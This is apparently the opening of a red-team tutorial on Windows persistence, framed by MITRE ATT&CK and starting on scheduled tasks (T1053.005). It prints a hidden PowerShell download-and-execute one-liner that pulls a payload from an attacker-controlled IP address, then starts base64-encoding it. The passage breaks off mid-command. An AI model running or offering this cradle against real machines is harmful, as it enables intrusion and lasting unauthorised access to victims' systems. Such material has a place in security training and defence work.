Persistence ways(The adversary is trying to maintain their foothold)
Gaining continued access to a computer system or network that has been compromised is known as persistence. It requires bypassing security measures and re-configuring systems so that access is maintained even after users log out or reboot the system. This type of access can be difficult to achieve, as the security measures that were designed to prevent initial access must be circumvented to maintain persistent access.
Persistence can be achieved by executing within userland, such as the current user, or by utilizing a higher privilege such as SYSTEM.
Let’s see some techniques-
Scheduled Tasks (T1053.005)-
Video demo:
a. Create a Powershell Scripted Web Delivery URL-
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.35.130:80/a'))"
b. Then we can base64 encode this-
$s = 'IEX ((new-object…